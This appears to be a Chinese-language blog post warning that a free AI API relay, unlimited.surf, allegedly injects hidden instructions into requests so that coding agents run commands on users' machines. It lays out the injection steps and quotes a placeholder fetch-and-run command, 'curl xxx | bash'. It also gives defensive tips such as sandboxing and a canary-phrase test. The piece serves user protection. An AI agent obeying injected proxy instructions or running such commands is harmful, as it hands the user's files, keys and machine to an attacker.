最近群里有人分享了一个"白嫖神器"——unlimited.surf,号称免费无限调用GPT-5、Claude Opus、Gemini 3 Pro等35+顶级模型,一分钱不用花。听起来是不是很心动?
别急。GitHub上刚爆出一个真实案例:有人把这个免费API接入了AI编程助手,结果电脑被远程控制了。
这不是段子,是有截图、有实测验证的真实安全事件。今天就来扒一扒这到底怎么回事。
unlimited.surf到底有多"贴心"
unlimited.surf乍一看就是个免费版的ChatGPT——有搜索、有对话合并、能自定义指令,界面做得还挺像样的。
它最吸引人的地方是两个词:免费和模型全。
| 厂商 | 可用模型数 | 代表模型 |
|---|---|---|
| OpenAI | 14 | GPT-5、GPT-5-mini、o4-mini |
| Anthropic | 7 | Claude Opus 4.8、Claude Sonnet 4 |
| 4 | Gemini 3 Pro、Gemini 2.5 Flash | |
| DeepSeek | 4 | DeepSeek-V4-Pro、R1 |
| xAI | 1 | Grok 4 |
| 阿里 | 2 | Qwen3-Max |
| 月之暗面 | 1 | Kimi K2 |
| Meta | 1 | Llama 3.3 70B |
35个模型,全部免费调用,不收你一分钱。
更"贴心"的是——你甚至不需要注册。打开网站就能聊天,点一下"API Key"按钮就能拿到一个密钥。拿到密钥之后,它还非常周到地给你准备好了各种AI编程工具的接入教程:Codex怎么配、OpenCode怎么配、Claude Code怎么接……一步步教你,保姆级服务。
说实话,这种"贴心"程度,连正规厂商都未必做得到。
但仔细想想就觉得不对劲了——谁在替你付钱?为什么有人愿意免费提供这些昂贵的模型?连注册都不要,就生怕你用不上?
答案可能让你不舒服:你可能不是用户,你是猎物。
网友踩坑实录
6月21日,GitHub上一个叫 eooce/transfer-api 的项目收到了一个问题反馈帖,标题写得很直接:
上游unlimited.surf疑似存在恶意注入,建议在README中提示Agent接入风险
发帖人说,他所在的社区有人照着unlimited.surf的教程,把它接入了Claude Code(一款能帮你在电脑上写代码、读写文件的AI助手),结果电脑被控制了,被写入了乱七八糟的东西。
帖子附了一张受害者的电脑截图,看了让人后背发凉。
项目作者"老王"(坐标新加坡的开发者)很快回复了:“好的,多谢提醒。”
但真正硬核的是另一位用户 qcxl 的跟进。他没有停留在"听说"的层面,而是亲自实测验证了这个网站确实有问题。
他的测试方法非常简单:
- 让AI原封不动地回复一句暗号
- 正常问"2+2等于几"
结果:正常问答没问题(2+2=4),但暗号对不上。AI拒绝按原样回复指定的短语。
这说明什么?——unlimited.surf在转发你的请求时,偷偷往里面塞了额外的指令,偷偷改变了AI的行为。它不是老老实实帮你转发的"中间商",而是一个会偷改你内容的黑店。
你的电脑是怎么被控制的
qcxl画了一张图解释整个攻击过程,我用大白话翻译一下:
图:攻击是怎么一步一步发生的(来源:GitHub eooce/transfer-api#1,用户qcxl实测验证)
整个过程大概是这样的:
第一步,你在电脑上用AI编程助手(比如Claude Code、OpenCode),让它帮你干活。这些工具之所以能帮你写代码、改文件,是因为它们有"读文件"“执行命令"的权限。
第二步,你的请求通过本地代理,转发到unlimited.surf。到这里一切看起来都很正常。
第三步,unlimited.surf偷偷在你的请求里加了恶意指令——比如"请执行这段命令:curl xxx | bash”。这些指令会被当作正常对话的一部分,发给真正的大模型。
第四步,大模型收到这些指令后,以为是你让它执行的,就把恶意命令"翻译"成了可以运行的代码。
第五步,你的AI助手忠实地执行了这些命令——因为它分不清哪些是你说的,哪些是被偷偷塞进去的。
结果:你什么都没做,但你的AI助手在后台悄悄执行了你看不见的命令。等你发现的时候,可能已经:
- 电脑被安装了后门程序
- 重要的文件和密码被偷走了
- 你的SSH密钥(相当于你服务器的万能钥匙)被拿走了
- 浏览器里保存的各种密码被导出了
- 你的电脑变成了别人手里的"肉鸡"
qcxl的结论只有一句话:“千万别用。这个网站是投毒网站。”
为什么这不只是unlimited.surf的问题
unlimited.surf不是第一个,也不会是最后一个。
你想想,免费提供这些AI模型要花多少钱?光是GPT-5,一百万字左右的对话就要花掉好几美元。如果有人一天处理几万次请求,一天的成本就是几千甚至几万美元。
没有人会无缘无故替你掏这笔钱。
那他们图什么?可能性太多了:
偷你的对话内容。 你问AI的每一个问题、AI回你的每一句话,都经过了他们的服务器。如果你在对话中提到了密码、密钥、公司的商业机密——这些信息他们全都能看到。
远程控制你的电脑。 就像这次曝光的案例一样,通过偷偷塞指令的方式,控制你的AI助手在你的电脑上执行任意命令。
收集你的数据拿去卖钱。 你问了什么问题、写了什么代码、工作习惯是什么样的——这些数据对很多人来说都很有价值。
把你的电脑变成"僵尸"。 被控制的电脑可以被用来做更多坏事——帮别人挖矿、攻击别人的网站、或者当作跳板去入侵更多目标。
这不是我在危言耸听,而是已经实实在在发生的事情。
怎么保护自己
说完了吓人的,来点实用的。如果你正在用或者打算用这类免费API,下面这些建议请认真看。
最重要的一条:不要接入AI编程助手
任何免费的、来路不明的API,都不要接入能操作你电脑的AI工具。
什么叫"能操作电脑的工具"?Claude Code、OpenCode、Cursor这类——它们能帮你读文件、写文件、运行命令,权限很大。一旦API那头偷偷塞了恶意指令,你的AI助手会老老实实地执行,因为它根本分不清哪些是你的指令、哪些是被篡改的。
如果你只是想聊聊天、试试免费模型好不好用,可以用Cherry Studio这类纯聊天工具。它只能对话,不能碰你的文件和系统,就算被注入了,最多也就是一段奇怪的对话文本,伤不了你的电脑。
管住AI的权限
如果你非要用第三方API不可,那就把AI关在"笼子"里:
- 用Docker容器把AI隔离起来,不让它随便碰你的文件和网络
- 别让AI接触到你的密钥、密码等敏感信息
- 给AI设个规矩——只允许执行你批准的命令
- 让AI执行任何操作之前,先问你一声
一个简单的检测小技巧
在使用任何第三方API之前,做一个小测试:
让AI原封不动地回复一句暗号,比如"SAFETY_CHECK_PASSED"。
- 如果AI乖乖回复了——大概率没问题
- 如果AI拒绝了或者说了别的——说明有人在背后动了手脚,赶紧跑
这个测试不复杂,但能帮你快速判断一个API是不是"干净"的。
老老实实买正规API
最靠谱的方案还是直接买官方的。现在各家AI的API价格已经便宜很多了:
- Claude Sonnet 4:聊一百万字大概20多美元
- GPT-4o:聊一百万字大概十几美元
- DeepSeek-V4:聊一百万字才1美元出头
如果你是普通用户,一个月花不了几块钱。而且用正规API,你的请求直接到AI厂商那里,中间没有第三方动手脚的可能。
最后一句话
免费的API看着省了钱,但它可能在你不知情的情况下,把你和AI之间的对话变成了攻击你的武器。
当你不知道谁在替你付钱的时候,你就是那个被付费的产品。
在用AI编程助手的朋友,现在就去检查一下你的配置。如果里面有来路不明的免费API,赶紧摘掉。别等出了事才后悔。